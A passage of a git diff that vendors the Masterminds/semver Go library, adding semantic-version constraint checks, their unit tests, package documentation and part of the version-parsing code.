+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if !c.dirty {
+ return v.Compare(c.con) < 0
+ }
+
+ if v.Major() > c.con.Major() {
+ return false
+ } else if v.Minor() > c.con.Minor() && !c.minorDirty {
+ return false
+ }
+
+ return true
+}
+
+func constraintGreaterThanEqual(v *Version, c *constraint) bool {
+ // An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease
+ // exists. This that case.
+ if !isNonZero(c.con) && isNonZero(v) {
+ return true
+ }
+
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ return v.Compare(c.con) >= 0
+}
+
+func constraintLessThanEqual(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if !c.dirty {
+ return v.Compare(c.con) <= 0
+ }
+
+ if v.Major() > c.con.Major() {
+ return false
+ } else if v.Minor() > c.con.Minor() && !c.minorDirty {
+ return false
+ }
+
+ return true
+}
+
+// ~*, ~>* --> >= 0.0.0 (any)
+// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0, <3.0.0
+// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0, <2.1.0
+// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0, <1.3.0
+// ~1.2.3, ~>1.2.3 --> >=1.2.3, <1.3.0
+// ~1.2.0, ~>1.2.0 --> >=1.2.0, <1.3.0
+func constraintTilde(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if v.LessThan(c.con) {
+ return false
+ }
+
+ // ~0.0.0 is a special case where all constraints are accepted. It's
+ // equivalent to >= 0.0.0.
+ if c.con.Major() == 0 && c.con.Minor() == 0 && c.con.Patch() == 0 &&
+ !c.minorDirty && !c.patchDirty {
+ return true
+ }
+
+ if v.Major() != c.con.Major() {
+ return false
+ }
+
+ if v.Minor() != c.con.Minor() && !c.minorDirty {
+ return false
+ }
+
+ return true
+}
+
+// When there is a .x (dirty) status it automatically opts in to ~. Otherwise
+// it's a straight =
+func constraintTildeOrEqual(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if c.dirty {
+ c.msg = constraintMsg["~"]
+ return constraintTilde(v, c)
+ }
+
+ return v.Equal(c.con)
+}
+
+// ^* --> (any)
+// ^2, ^2.x, ^2.x.x --> >=2.0.0, <3.0.0
+// ^2.0, ^2.0.x --> >=2.0.0, <3.0.0
+// ^1.2, ^1.2.x --> >=1.2.0, <2.0.0
+// ^1.2.3 --> >=1.2.3, <2.0.0
+// ^1.2.0 --> >=1.2.0, <2.0.0
+func constraintCaret(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if v.LessThan(c.con) {
+ return false
+ }
+
+ if v.Major() != c.con.Major() {
+ return false
+ }
+
+ return true
+}
+
+var constraintRangeRegex *regexp.Regexp
+
+const cvRegex string = `v?([0-9|x|X|\*]+)(\.[0-9|x|X|\*]+)?(\.[0-9|x|X|\*]+)?` +
+ `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` +
+ `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?`
+
+func isX(x string) bool {
+ switch x {
+ case "x", "*", "X":
+ return true
+ default:
+ return false
+ }
+}
+
+func rewriteRange(i string) string {
+ m := constraintRangeRegex.FindAllStringSubmatch(i, -1)
+ if m == nil {
+ return i
+ }
+ o := i
+ for _, v := range m {
+ t := fmt.Sprintf(">= %s, <= %s", v[1], v[11])
+ o = strings.Replace(o, v[0], t, 1)
+ }
+
+ return o
+}
+
+// Detect if a version is not zero (0.0.0)
+func isNonZero(v *Version) bool {
+ if v.Major() != 0 || v.Minor() != 0 || v.Patch() != 0 || v.Prerelease() != "" {
+ return true
+ }
+
+ return false
+}
diff --git a/vendor/github.com/Masterminds/semver/constraints_test.go b/vendor/github.com/Masterminds/semver/constraints_test.go
new file mode 100644
index 0000000000..bf52c90bd2
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/constraints_test.go
@@ -0,0 +1,465 @@
+package semver
+
+import (
+ "reflect"
+ "testing"
+)
+
+func TestParseConstraint(t *testing.T) {
+ tests := []struct {
+ in string
+ f cfunc
+ v string
+ err bool
+ }{
+ {">= 1.2", constraintGreaterThanEqual, "1.2.0", false},
+ {"1.0", constraintTildeOrEqual, "1.0.0", false},
+ {"foo", nil, "", true},
+ {"<= 1.2", constraintLessThanEqual, "1.2.0", false},
+ {"=< 1.2", constraintLessThanEqual, "1.2.0", false},
+ {"=> 1.2", constraintGreaterThanEqual, "1.2.0", false},
+ {"v1.2", constraintTildeOrEqual, "1.2.0", false},
+ {"=1.5", constraintTildeOrEqual, "1.5.0", false},
+ {"> 1.3", constraintGreaterThan, "1.3.0", false},
+ {"< 1.4.1", constraintLessThan, "1.4.1", false},
+ }
+
+ for _, tc := range tests {
+ c, err := parseConstraint(tc.in)
+ if tc.err && err == nil {
+ t.Errorf("Expected error for %s didn't occur", tc.in)
+ } else if !tc.err && err != nil {
+ t.Errorf("Unexpected error for %s", tc.in)
+ }
+
+ // If an error was expected continue the loop and don't try the other
+ // tests as they will cause errors.
+ if tc.err {
+ continue
+ }
+
+ if tc.v != c.con.String() {
+ t.Errorf("Incorrect version found on %s", tc.in)
+ }
+
+ f1 := reflect.ValueOf(tc.f)
+ f2 := reflect.ValueOf(c.function)
+ if f1 != f2 {
+ t.Errorf("Wrong constraint found for %s", tc.in)
+ }
+ }
+}
+
+func TestConstraintCheck(t *testing.T) {
+ tests := []struct {
+ constraint string
+ version string
+ check bool
+ }{
+ {"= 2.0", "1.2.3", false},
+ {"= 2.0", "2.0.0", true},
+ {"4.1", "4.1.0", true},
+ {"!=4.1", "4.1.0", false},
+ {"!=4.1", "5.1.0", true},
+ {">1.1", "4.1.0", true},
+ {">1.1", "1.1.0", false},
+ {"<1.1", "0.1.0", true},
+ {"<1.1", "1.1.0", false},
+ {"<1.1", "1.1.1", false},
+ {">=1.1", "4.1.0", true},
+ {">=1.1", "1.1.0", true},
+ {">=1.1", "0.0.9", false},
+ {"<=1.1", "0.1.0", true},
+ {"<=1.1", "1.1.0", true},
+ {"<=1.1", "1.1.1", false},
+ {">0", "0.0.1-alpha", true},
+ {">=0", "0.0.1-alpha", true},
+ {">0", "0", false},
+ {">=0", "0", true},
+ {"=0", "1", false},
+ }
+
+ for _, tc := range tests {
+ c, err := parseConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ a := c.check(v)
+ if a != tc.check {
+ t.Errorf("Constraint %q failing with %q", tc.constraint, tc.version)
+ }
+ }
+}
+
+func TestNewConstraint(t *testing.T) {
+ tests := []struct {
+ input string
+ ors int
+ count int
+ err bool
+ }{
+ {">= 1.1", 1, 1, false},
+ {"2.0", 1, 1, false},
+ {"v2.3.5-20161202202307-sha.e8fc5e5", 1, 1, false},
+ {">= bar", 0, 0, true},
+ {">= 1.2.3, < 2.0", 1, 2, false},
+ {">= 1.2.3, < 2.0 || => 3.0, < 4", 2, 2, false},
+
+ // The 3 - 4 should be broken into 2 by the range rewriting
+ {"3 - 4 || => 3.0, < 4", 2, 2, false},
+ }
+
+ for _, tc := range tests {
+ v, err := NewConstraint(tc.input)
+ if tc.err && err == nil {
+ t.Errorf("expected but did not get error for: %s", tc.input)
+ continue
+ } else if !tc.err && err != nil {
+ t.Errorf("unexpectederror for input %s: %s", tc.input, err)
+ continue
+ }
+ if tc.err {
+ continue
+ }
+
+ l := len(v.constraints)
+ if tc.ors != l {
+ t.Errorf("Expected %s to have %d ORs but got %d",
+ tc.input, tc.ors, l)
+ }
+
+ l = len(v.constraints[0])
+ if tc.count != l {
+ t.Errorf("Expected %s to have %d constraints but got %d",
+ tc.input, tc.count, l)
+ }
+ }
+}
+
+func TestConstraintsCheck(t *testing.T) {
+ tests := []struct {
+ constraint string
+ version string
+ check bool
+ }{
+ {"*", "1.2.3", true},
+ {"~0.0.0", "1.2.3", true},
+ {"0.x.x", "1.2.3", false},
+ {"0.0.x", "1.2.3", false},
+ {"0.0.0", "1.2.3", false},
+ {"*", "1.2.3", true},
+ {"^0.0.0", "1.2.3", false},
+ {"= 2.0", "1.2.3", false},
+ {"= 2.0", "2.0.0", true},
+ {"4.1", "4.1.0", true},
+ {"4.1.x", "4.1.3", true},
+ {"1.x", "1.4", true},
+ {"!=4.1", "4.1.0", false},
+ {"!=4.1-alpha", "4.1.0-alpha", false},
+ {"!=4.1-alpha", "4.1.0", true},
+ {"!=4.1", "5.1.0", true},
+ {"!=4.x", "5.1.0", true},
+ {"!=4.x", "4.1.0", false},
+ {"!=4.1.x", "4.2.0", true},
+ {"!=4.2.x", "4.2.3", false},
+ {">1.1", "4.1.0", true},
+ {">1.1", "1.1.0", false},
+ {"<1.1", "0.1.0", true},
+ {"<1.1", "1.1.0", false},
+ {"<1.1", "1.1.1", false},
+ {"<1.x", "1.1.1", true},
+ {"<1.x", "2.1.1", false},
+ {"<1.1.x", "1.2.1", false},
+ {"<1.1.x", "1.1.500", true},
+ {"<1.2.x", "1.1.1", true},
+ {">=1.1", "4.1.0", true},
+ {">=1.1", "4.1.0-beta", false},
+ {">=1.1", "1.1.0", true},
+ {">=1.1", "0.0.9", false},
+ {"<=1.1", "0.1.0", true},
+ {"<=1.1", "0.1.0-alpha", false},
+ {"<=1.1-a", "0.1.0-alpha", true},
+ {"<=1.1", "1.1.0", true},
+ {"<=1.x", "1.1.0", true},
+ {"<=2.x", "3.1.0", false},
+ {"<=1.1", "1.1.1", false},
+ {"<=1.1.x", "1.2.500", false},
+ {">1.1, <2", "1.1.1", true},
+ {">1.1, <3", "4.3.2", false},
+ {">=1.1, <2, !=1.2.3", "1.2.3", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true},
+ {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false},
+ {"1.1 - 2", "1.1.1", true},
+ {"1.1-3", "4.3.2", false},
+ {"^1.1", "1.1.1", true},
+ {"^1.1", "4.3.2", false},
+ {"^1.x", "1.1.1", true},
+ {"^2.x", "1.1.1", false},
+ {"^1.x", "2.1.1", false},
+ {"^1.x", "1.1.1-beta1", false},
+ {"^1.1.2-alpha", "1.2.1-beta1", true},
+ {"^1.2.x-alpha", "1.1.1-beta1", false},
+ {"~*", "2.1.1", true},
+ {"~1", "2.1.1", false},
+ {"~1", "1.3.5", true},
+ {"~1", "1.4", true},
+ {"~1.x", "2.1.1", false},
+ {"~1.x", "1.3.5", true},
+ {"~1.x", "1.4", true},
+ {"~1.1", "1.1.1", true},
+ {"~1.1", "1.1.1-alpha", false},
+ {"~1.1-alpha", "1.1.1-beta", true},
+ {"~1.1.1-beta", "1.1.1-alpha", false},
+ {"~1.1.1-beta", "1.1.1", true},
+ {"~1.2.3", "1.2.5", true},
+ {"~1.2.3", "1.2.2", false},
+ {"~1.2.3", "1.3.2", false},
+ {"~1.1", "1.2.3", false},
+ {"~1.3", "2.4.5", false},
+ }
+
+ for _, tc := range tests {
+ c, err := NewConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ a := c.Check(v)
+ if a != tc.check {
+ t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version)
+ }
+ }
+}
+
+func TestRewriteRange(t *testing.T) {
+ tests := []struct {
+ c string
+ nc string
+ }{
+ {"2 - 3", ">= 2, <= 3"},
+ {"2 - 3, 2 - 3", ">= 2, <= 3,>= 2, <= 3"},
+ {"2 - 3, 4.0.0 - 5.1", ">= 2, <= 3,>= 4.0.0, <= 5.1"},
+ }
+
+ for _, tc := range tests {
+ o := rewriteRange(tc.c)
+
+ if o != tc.nc {
+ t.Errorf("Range %s rewritten incorrectly as '%s'", tc.c, o)
+ }
+ }
+}
+
+func TestIsX(t *testing.T) {
+ tests := []struct {
+ t string
+ c bool
+ }{
+ {"A", false},
+ {"%", false},
+ {"X", true},
+ {"x", true},
+ {"*", true},
+ }
+
+ for _, tc := range tests {
+ a := isX(tc.t)
+ if a != tc.c {
+ t.Errorf("Function isX error on %s", tc.t)
+ }
+ }
+}
+
+func TestConstraintsValidate(t *testing.T) {
+ tests := []struct {
+ constraint string
+ version string
+ check bool
+ }{
+ {"*", "1.2.3", true},
+ {"~0.0.0", "1.2.3", true},
+ {"= 2.0", "1.2.3", false},
+ {"= 2.0", "2.0.0", true},
+ {"4.1", "4.1.0", true},
+ {"4.1.x", "4.1.3", true},
+ {"1.x", "1.4", true},
+ {"!=4.1", "4.1.0", false},
+ {"!=4.1", "5.1.0", true},
+ {"!=4.x", "5.1.0", true},
+ {"!=4.x", "4.1.0", false},
+ {"!=4.1.x", "4.2.0", true},
+ {"!=4.2.x", "4.2.3", false},
+ {">1.1", "4.1.0", true},
+ {">1.1", "1.1.0", false},
+ {"<1.1", "0.1.0", true},
+ {"<1.1", "1.1.0", false},
+ {"<1.1", "1.1.1", false},
+ {"<1.x", "1.1.1", true},
+ {"<1.x", "2.1.1", false},
+ {"<1.1.x", "1.2.1", false},
+ {"<1.1.x", "1.1.500", true},
+ {"<1.2.x", "1.1.1", true},
+ {">=1.1", "4.1.0", true},
+ {">=1.1", "1.1.0", true},
+ {">=1.1", "0.0.9", false},
+ {"<=1.1", "0.1.0", true},
+ {"<=1.1", "1.1.0", true},
+ {"<=1.x", "1.1.0", true},
+ {"<=2.x", "3.1.0", false},
+ {"<=1.1", "1.1.1", false},
+ {"<=1.1.x", "1.2.500", false},
+ {">1.1, <2", "1.1.1", true},
+ {">1.1, <3", "4.3.2", false},
+ {">=1.1, <2, !=1.2.3", "1.2.3", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true},
+ {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false},
+ {"1.1 - 2", "1.1.1", true},
+ {"1.1-3", "4.3.2", false},
+ {"^1.1", "1.1.1", true},
+ {"^1.1", "1.1.1-alpha", false},
+ {"^1.1.1-alpha", "1.1.1-beta", true},
+ {"^1.1.1-beta", "1.1.1-alpha", false},
+ {"^1.1", "4.3.2", false},
+ {"^1.x", "1.1.1", true},
+ {"^2.x", "1.1.1", false},
+ {"^1.x", "2.1.1", false},
+ {"~*", "2.1.1", true},
+ {"~1", "2.1.1", false},
+ {"~1", "1.3.5", true},
+ {"~1", "1.3.5-beta", false},
+ {"~1.x", "2.1.1", false},
+ {"~1.x", "1.3.5", true},
+ {"~1.x", "1.3.5-beta", false},
+ {"~1.3.6-alpha", "1.3.5-beta", false},
+ {"~1.3.5-alpha", "1.3.5-beta", true},
+ {"~1.3.5-beta", "1.3.5-alpha", false},
+ {"~1.x", "1.4", true},
+ {"~1.1", "1.1.1", true},
+ {"~1.2.3", "1.2.5", true},
+ {"~1.2.3", "1.2.2", false},
+ {"~1.2.3", "1.3.2", false},
+ {"~1.1", "1.2.3", false},
+ {"~1.3", "2.4.5", false},
+ }
+
+ for _, tc := range tests {
+ c, err := NewConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ a, msgs := c.Validate(v)
+ if a != tc.check {
+ t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version)
+ } else if !a && len(msgs) == 0 {
+ t.Errorf("%q failed with %q but no errors returned", tc.constraint, tc.version)
+ }
+
+ // if a == false {
+ // for _, m := range msgs {
+ // t.Errorf("%s", m)
+ // }
+ // }
+ }
+
+ v, err := NewVersion("1.2.3")
+ if err != nil {
+ t.Errorf("err: %s", err)
+ }
+
+ c, err := NewConstraint("!= 1.2.5, ^2, <= 1.1.x")
+ if err != nil {
+ t.Errorf("err: %s", err)
+ }
+
+ _, msgs := c.Validate(v)
+ if len(msgs) != 2 {
+ t.Error("Invalid number of validations found")
+ }
+ e := msgs[0].Error()
+ if e != "1.2.3 does not have same major version as 2" {
+ t.Error("Did not get expected message: 1.2.3 does not have same major version as 2")
+ }
+ e = msgs[1].Error()
+ if e != "1.2.3 is greater than 1.1.x" {
+ t.Error("Did not get expected message: 1.2.3 is greater than 1.1.x")
+ }
+
+ tests2 := []struct {
+ constraint, version, msg string
+ }{
+ {"= 2.0", "1.2.3", "1.2.3 is not equal to 2.0"},
+ {"!=4.1", "4.1.0", "4.1.0 is equal to 4.1"},
+ {"!=4.x", "4.1.0", "4.1.0 is equal to 4.x"},
+ {"!=4.2.x", "4.2.3", "4.2.3 is equal to 4.2.x"},
+ {">1.1", "1.1.0", "1.1.0 is less than or equal to 1.1"},
+ {"<1.1", "1.1.0", "1.1.0 is greater than or equal to 1.1"},
+ {"<1.1", "1.1.1", "1.1.1 is greater than or equal to 1.1"},
+ {"<1.x", "2.1.1", "2.1.1 is greater than or equal to 1.x"},
+ {"<1.1.x", "1.2.1", "1.2.1 is greater than or equal to 1.1.x"},
+ {">=1.1", "0.0.9", "0.0.9 is less than 1.1"},
+ {"<=2.x", "3.1.0", "3.1.0 is greater than 2.x"},
+ {"<=1.1", "1.1.1", "1.1.1 is greater than 1.1"},
+ {"<=1.1.x", "1.2.500", "1.2.500 is greater than 1.1.x"},
+ {">1.1, <3", "4.3.2", "4.3.2 is greater than or equal to 3"},
+ {">=1.1, <2, !=1.2.3", "1.2.3", "1.2.3 is equal to 1.2.3"},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", "3.0.0 is greater than or equal to 2"},
+ {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", "1.2.3 is equal to 1.2.3"},
+ {"1.1 - 3", "4.3.2", "4.3.2 is greater than 3"},
+ {"^1.1", "4.3.2", "4.3.2 does not have same major version as 1.1"},
+ {"^2.x", "1.1.1", "1.1.1 does not have same major version as 2.x"},
+ {"^1.x", "2.1.1", "2.1.1 does not have same major version as 1.x"},
+ {"~1", "2.1.2", "2.1.2 does not have same major and minor version as 1"},
+ {"~1.x", "2.1.1", "2.1.1 does not have same major and minor version as 1.x"},
+ {"~1.2.3", "1.2.2", "1.2.2 does not have same major and minor version as 1.2.3"},
+ {"~1.2.3", "1.3.2", "1.3.2 does not have same major and minor version as 1.2.3"},
+ {"~1.1", "1.2.3", "1.2.3 does not have same major and minor version as 1.1"},
+ {"~1.3", "2.4.5", "2.4.5 does not have same major and minor version as 1.3"},
+ }
+
+ for _, tc := range tests2 {
+ c, err := NewConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ _, msgs := c.Validate(v)
+ e := msgs[0].Error()
+ if e != tc.msg {
+ t.Errorf("Did not get expected message %q: %s", tc.msg, e)
+ }
+ }
+}
diff --git a/vendor/github.com/Masterminds/semver/doc.go b/vendor/github.com/Masterminds/semver/doc.go
new file mode 100644
index 0000000000..e00f65eb73
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/doc.go
@@ -0,0 +1,115 @@
+/*
+Package semver provides the ability to work with Semantic Versions (http://semver.org) in Go.
+
+Specifically it provides the ability to:
+
+ * Parse semantic versions
+ * Sort semantic versions
+ * Check if a semantic version fits within a set of constraints
+ * Optionally work with a `v` prefix
+
+Parsing Semantic Versions
+
+To parse a semantic version use the `NewVersion` function. For example,
+
+ v, err := semver.NewVersion("1.2.3-beta.1+build345")
+
+If there is an error the version wasn't parseable. The version object has methods
+to get the parts of the version, compare it to other versions, convert the
+version back into a string, and get the original string. For more details
+please see the documentation at https://godoc.org/github.com/Masterminds/semver.
+
+Sorting Semantic Versions
+
+A set of versions can be sorted using the `sort` package from the standard library.
+For example,
+
+ raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",}
+ vs := make([]*semver.Version, len(raw))
+ for i, r := range raw {
+ v, err := semver.NewVersion(r)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ vs[i] = v
+ }
+
+ sort.Sort(semver.Collection(vs))
+
+Checking Version Constraints
+
+Checking a version against version constraints is one of the most featureful
+parts of the package.
+
+ c, err := semver.NewConstraint(">= 1.2.3")
+ if err != nil {
+ // Handle constraint not being parseable.
+ }
+
+ v, _ := semver.NewVersion("1.3")
+ if err != nil {
+ // Handle version not being parseable.
+ }
+ // Check if the version meets the constraints. The a variable will be true.
+ a := c.Check(v)
+
+Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma separated and comparisons. These are then separated by || separated or
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+ * `=`: equal (aliased to no operator)
+ * `!=`: not equal
+ * `>`: greater than
+ * `<`: less than
+ * `>=`: greater than or equal to
+ * `<=`: less than or equal to
+
+Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphens ranges.
+These look like:
+
+ * `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+ * `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the pack level comparison (see tilde below). For example,
+
+ * `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+ * `>= 1.2.x` is equivalent to `>= 1.2.0`
+ * `<= 2.x` is equivalent to `<= 3`
+ * `*` is equivalent to `>= 0.0.0`
+
+Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+ * `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+ * `~1` is equivalent to `>= 1, < 2`
+ * `~2.3` is equivalent to `>= 2.3, < 2.4`
+ * `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+ * `~1.x` is equivalent to `>= 1, < 2`
+
+Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparisons of API versions as a major change is API breaking. For example,
+
+ * `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+ * `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+ * `^2.3` is equivalent to `>= 2.3, < 3`
+ * `^2.x` is equivalent to `>= 2.0.0, < 3`
+*/
+package semver
diff --git a/vendor/github.com/Masterminds/semver/version.go b/vendor/github.com/Masterminds/semver/version.go
new file mode 100644
index 0000000000..9d22ea6308
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/version.go
@@ -0,0 +1,421 @@
+package semver
+
+import (
+ "bytes"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "regexp"
+ "strconv"
+ "strings"
+)
+
+// The compiled version of the regex created at init() is cached here so it
+// only needs to be created once.
+var versionRegex *regexp.Regexp
+var validPrereleaseRegex *regexp.Regexp
+
+var (
+ // ErrInvalidSemVer is returned a version is found to be invalid when
+ // being parsed.
+ ErrInvalidSemVer = errors.New("Invalid Semantic Version")
+
+ // ErrInvalidMetadata is returned when the metadata is an invalid format
+ ErrInvalidMetadata = errors.New("Invalid Metadata string")
+
+ // ErrInvalidPrerelease is returned when the pre-release is an invalid format
+ ErrInvalidPrerelease = errors.New("Invalid Prerelease string")
+)
+
+// SemVerRegex is the regular expression used to parse a semantic version.
+const SemVerRegex string = `v?([0-9]+)(\.[0-9]+)?(\.[0-9]+)?` +
+ `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` +
+ `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?`
+
+// ValidPrerelease is the regular expression which validates
+// both prerelease and metadata values.
+const ValidPrerelease string = `^([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*)`
+
+// Version represents a single semantic version.
+type Version struct {
+ major, minor, patch int64
+ pre string
+ metadata string
+ original string
+}
+
+func init() {
+ versionRegex = regexp.MustCompile("^" + SemVerRegex + "$")
+ validPrereleaseRegex = regexp.MustCompile(ValidPrerelease)
+}
+
+// NewVersion parses a given version and returns an instance of Version or
+// an error if unable to parse the version.
+func NewVersion(v string) (*Version, error) {
+ m := versionRegex.FindStringSubmatch(v)
+ if m == nil {
+ return nil, ErrInvalidSemVer
+ }
+
+ sv := &Version{
+ metadata: m[8],
+ pre: m[5],
+ original: v,
+ }
+
+ var temp int64
+ temp, err := strconv.ParseInt(m[1], 10, 64)
+ if err != nil {
+ return nil, fmt.Errorf("Error parsing version segment: %s", err)
+ }
+ sv.major = temp
+
+ if m[2] != "" {
+ temp, err = strconv.ParseInt(strings.TrimPrefix(m[2], "."), 10, 64)
+ if err != nil {
+ return nil, fmt.Errorf("Error parsing version segment: %s", err)
+ }
+ sv.minor = temp
+ } else {
+ sv.minor = 0
+ }
+
+ if m[3] != "" {
+ temp, err = strconv.ParseInt(strings.TrimPrefix(m[3], "."), 10, 64)
+ if err != nil {
+ return nil, fmt.Errorf("Error parsing version segment: %s", err)
+ }
+ sv.patch = temp
+ } else {
+ sv.patch = 0
+ }
+
+ return sv, nil
+}
+
+// MustParse parses a given version and panics on error.
+func MustParse(v string) *Version {
+ sv, err := NewVersion(v)
+ if err != nil {
+ panic(err)
+ }
+ return sv
+}
+
+// String converts a Version object to a string.
+// Note, if the original version contained a leading v this version will not.
+// See the Original() method to retrieve the original value. Semantic Versions
+// don't contain a leading v per the spec. Instead it's optional on
+// impelementation.
+func (v *Version) String() string {
+ var buf bytes.Buffer
+
+ fmt.Fprintf(&buf, "%d.%d.%d", v.major, v.minor, v.patch)
+ if v.pre != "" {
+ fmt.Fprintf(&buf, "-%s", v.pre)
+ }
+ if v.metadata != "" {
+ fmt.Fprintf(&buf, "+%s", v.metadata)
+ }
+
+ return buf.String()
+}
+
+// Original returns the original value passed in to be parsed.
+func (v *Version) Original() string {
+ return v.original
+}
+
+// Major returns the major version.
+func (v *Version) Major() int64 {
+ return v.major
+}
+
+// Minor returns the minor version.
+func (v *Version) Minor() int64 {
+ return v.minor
+}
+
+// Patch returns the patch version.
+func (v *Version) Patch() int64 {
+ return v.patch
+}
+
+// Prerelease returns the pre-release version.
+func (v *Version) Prerelease() string {
+ return v.pre
+}
+
+// Metadata returns the metadata on the version.
+func (v *Version) Metadata() string {
+ return v.metadata
+}
+
+// originalVPrefix returns the original 'v' prefix if any.
+func (v *Version) originalVPrefix() string {
+
+ // Note, only lowercase v is supported as a prefix by the parser.
+ if v.original != "" && v.original[:1] == "v" {
+ return v.original[:1]
+ }
+ return ""
+}
+
+// IncPatch produces the next patch version.
+// If the current version does not have prerelease/metadata information,
+// it unsets metadata and prerelease values, increments patch number.
+// If the current version has any of prerelease or metadata information,
+// it unsets both values and keeps curent patch value
+func (v Version) IncPatch() Version {
+ vNext := v
+ // according to http://semver.org/#spec-item-9
+ // Pre-release versions have a lower precedence than the associated normal version.
+ // according to http://semver.org/#spec-item-10
+ // Build metadata SHOULD be ignored when determining version precedence.
+ if v.pre != "" {
+ vNext.metadata = ""
+ vNext.pre = ""
+ } else {
+ vNext.metadata = ""
+ vNext.pre = ""
+ vNext.patch = v.patch + 1
+ }
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext
+}
+
+// IncMinor produces the next minor version.
+// Sets patch to 0.
+// Increments minor number.
+// Unsets metadata.
+// Unsets prerelease status.
+func (v Version) IncMinor() Version {
+ vNext := v
+ vNext.metadata = ""
+ vNext.pre = ""
+ vNext.patch = 0
+ vNext.minor = v.minor + 1
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext
+}
+
+// IncMajor produces the next major version.
+// Sets patch to 0.
+// Sets minor to 0.
+// Increments major number.
+// Unsets metadata.
+// Unsets prerelease status.
+func (v Version) IncMajor() Version {
+ vNext := v
+ vNext.metadata = ""
+ vNext.pre = ""
+ vNext.patch = 0
+ vNext.minor = 0
+ vNext.major = v.major + 1
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext
+}
+
+// SetPrerelease defines the prerelease value.
+// Value must not include the required 'hypen' prefix.
+func (v Version) SetPrerelease(prerelease string) (Version, error) {
+ vNext := v
+ if len(prerelease) > 0 && !validPrereleaseRegex.MatchString(prerelease) {
+ return vNext, ErrInvalidPrerelease
+ }
+ vNext.pre = prerelease
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext, nil
